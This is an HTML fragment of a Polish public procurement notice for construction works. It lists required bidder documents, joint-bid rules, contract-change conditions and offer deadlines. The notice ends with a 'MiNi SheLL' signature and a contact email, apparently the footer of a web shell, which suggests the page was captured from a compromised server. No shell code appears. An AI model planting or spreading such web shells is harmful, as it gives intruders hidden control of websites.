ustawy Pzp; (Na podstawie art. 127 ust. 1 pkt 1 Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w jednolitym dokumencie dane umożliwiające dostęp do tych środków).<br/>2)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>3)	oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 3 ustawy Pzp, o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo — w przypadku wydania takiego wyroku lub decyzji dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności - załącznik nr 5 do SWZ;<br/>4)	oświadczenie Wykonawcy w zakresie określonym w art. 108 ust. 1 pkt 4 ustawy PZP o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienie publiczne - załącznik nr 5 do SWZ.<br/>Zamawiający w sytuacji, gdy wykonawca polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy PZP żąda przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych powyżej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Wykonawca złoży:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane według wzoru, stanowiącego załącznik nr 7 do SWZ, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Wykazane roboty budowlane muszą spełniać warunek określony w Rozdziale 8 SWZ ust. 2 pkt 4).<br/>W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny ww. wykaz.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA SKŁADA SIĘ Z: <br/>1)	Formularza oferty sporządzonego według wzoru stanowiącego Załącznik nr 1 do SWZ; <br/>2)	Oświadczenia, o którym mowa w art.125 ust. 1 ustawy Pzp - Załącznik nr 2 do SWZ; <br/>3)	zobowiązania podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy, o którym mowa w rozdziale 6 SWZ – załącznik nr 6 do SWZ (jeżeli dotyczy); <br/>4)	pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy dla osoby/osób podpisującej/cych ofertę zgodnie z rozdziału 7 ust. 1 SWZ (jeżeli dotyczy); <br/>5)	W przypadku, gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku – szczegóły opisane rozdziale 12 ust. 10 SWZ (jeżeli dotyczy);<br/>6)	Wraz z ofertą nie należy składać dokumentów podmiotowych środków dowodowych. Dokumenty te składa Wykonawca, którego oferta została najwyżej oceniona, po otrzymaniu wezwania Zamawiającego;<br/>7)	Środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. Wykonawcy występujący wspólnie (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 ustawy Pzp zobowiązani są ustanowić pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z podmiotem występującym jako Pełnomocnik. Dokument ten winien być opatrzony przez osobę/osoby uprawnioną(-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego z Wykonawców kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum. <br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale 9 ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy – załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie aneksu do Umowy na podstawie<br/>art.455 ust.1 pkt 1 pzp w następujących przypadkach:<br/>1) zmiana terminu realizacji Umowy w przypadku konieczności udzielenia zamówień nieobjętych niniejszą Umową, a których<br/>wykonanie będzie miało wpływ na wykonanie Umowy o zamówienie (w tym m.in. robót dodatkowych); pod warunkiem<br/>wykonania protokołu koniczności, z którego będzie wynikała konieczność / zasadność wykonania tych robót oraz<br/>wydłużenie terminu realizacji;<br/>2) zmiana terminu realizacji umowy w przypadku siły wyższej rozumianej jako pożar, powódź, huragan, eksplozję, awarie<br/>energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy<br/>administracji publicznej, epidemię, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich pozostające<br/>poza kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia<br/>nie można było im zapobiec, pod warunkiem złożenia wniosku przez jedną ze stron lub sporządzeniem protokołu z udziałem<br/>uczestników procesu budowlanego; wniosek lub protokół powinien zawierać opis zaistniałej sytuacji, jej wpływ na realizację<br/>zamówienia oraz oświadczenia lub inne dokumenty potwierdzające zaistniałą sytuację;<br/>3) zmiana terminu realizacji umowy w przypadku wstrzymania przez Zamawiającego lub organy administracji publicznej<br/>prac objętych Umową, w szczególności z powodu zagrożenia życia, zdrowia na budowie, pod warunkiem złożenia wniosku<br/>przez jedną ze stron lub sporządzeniem protokołu z udziałem uczestników procesu budowlanego; wniosek lub protokół<br/>powinien zawierać opis zaistniałej sytuacji, jej wpływ na termin realizacji zamówienia oraz ewentualne dowody (np. kopie<br/>decyzji administracyjnych), inne dokumenty potwierdzające zaistniałą sytuację;<br/>4) zmiana terminu realizacji umowy w przypadku wystąpienia okoliczności, których strony nie były w stanie przewidzieć<br/>mimo zachowania należytej staranności, pod warunkiem złożenia wniosku przez jedną ze stron lub sporządzeniem<br/>protokołu z udziałem uczestników procesu budowlanego; wniosek lub protokół powinien zawierać opis zaistniałej sytuacji, jej<br/>wpływ na termin realizacji zamówienia oraz ewentualne dowody (np. kopie decyzji administracyjnych), inne dokumenty<br/>potwierdzające zaistniałą sytuację;<br/>5) zmiana terminu realizacji umowy aneksem do umowy, w przypadku konieczności zapewnienia dłuższego terminu<br/>realizacji robót, wynikających z terminów dostaw materiałów lub urządzeń (w tym w związku z panującym stanem pandemii),<br/>pod warunkiem złożenia pisemnego wniosku przez Wykonawcę, udokumentowania go (np. poprzez przedstawienia kopii<br/>zamówień, zleceń, umów, informacji od dostawców); powyższa okoliczność powinna znaleźć odzwierciedlenie w protokole<br/>spisanym przez uczestników procesu budowlanego;<br/>2. Na podstawie art.455 ust.1 pkt 2 pzp dopuszcza się możliwość zmiany Wykonawcy, z którym zawarto umowę i którego<br/>ma zastąpić nowy Wykonawca, co jest wynikiem sukcesji – przejęcia, połączenia, podziału, przekształcenia, upadłości,<br/>restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca<br/>spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia, oraz nie pociąga to za sobą<br/>innych istotnych zmian umowy.<br/>3. Na podstawie art.455 ust.1 pkt 3) i 4) oraz art. 455 ust. 2 pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać wyłącznie na Platformie pod adresem: https://platformazakupowa.pl/transakcja/1050562</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-06 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com